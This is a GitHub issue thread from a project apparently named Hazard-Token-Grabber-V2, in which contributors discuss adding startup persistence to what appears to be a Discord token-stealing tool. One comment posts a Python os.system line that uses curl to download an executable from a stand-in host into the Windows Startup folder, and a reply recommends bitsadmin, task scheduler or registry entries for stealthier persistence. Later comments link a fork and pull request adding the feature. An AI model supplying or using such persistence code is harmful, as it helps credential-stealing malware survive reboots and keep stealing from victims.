### ISSUE TITLE
add it to startup

### ISSUE THREAD

**Issue by BloodOnTop** [Rdimo/Hazard-Token-Grabber-V2#157]
i can do it but u should do it too @Rdimo

**Comment by addi00000** [comment]
```python
os.system(f'curl https://yourfile.com/file.exe --output "C:/Users/{os.getenv("UserName")}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/file.exe"')
```

my simple solution for injecting some exe into startup from the internet

**Comment by addi00000** [comment]
> ```python
> ```python
> os.system(f'curl https://yourfile.com/file.exe --output "C:/Users/{os.getenv("UserName")}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/file.exe"')
> ```
> 
> 
>     
>       
>     
> 
>       
>     
> 
>     
>   
> my simple solution for injecting some exe into startup from the internet
> 
> Your simple solution s̶u̶c̶k̶s̶ needs some work.
> 
> Use bitsadmin instead. C-URL is slow and sometimes does not work well
> Putting a file in the startup folder is like the dumbest thing ever. Use task scheduler, registry, or other means of persistance.
> It does not "inject" it just drops a binary to the startup
> ```

“Simple”

**Comment by LocalSmail** [comment]
I've submitted an start-up function for the script so it runs when the window as booted, Just need to wait for Rdimo to add it.

**Comment by LocalSmail** [comment]
https://github.com/LocalSmail/Hazard-Token-Grabber-V2/blob/patch-2/main.py

**Comment by Resisst** [comment]
https://github.com/Rdimo/Hazard-Token-Grabber-V2/pull/185 

👍
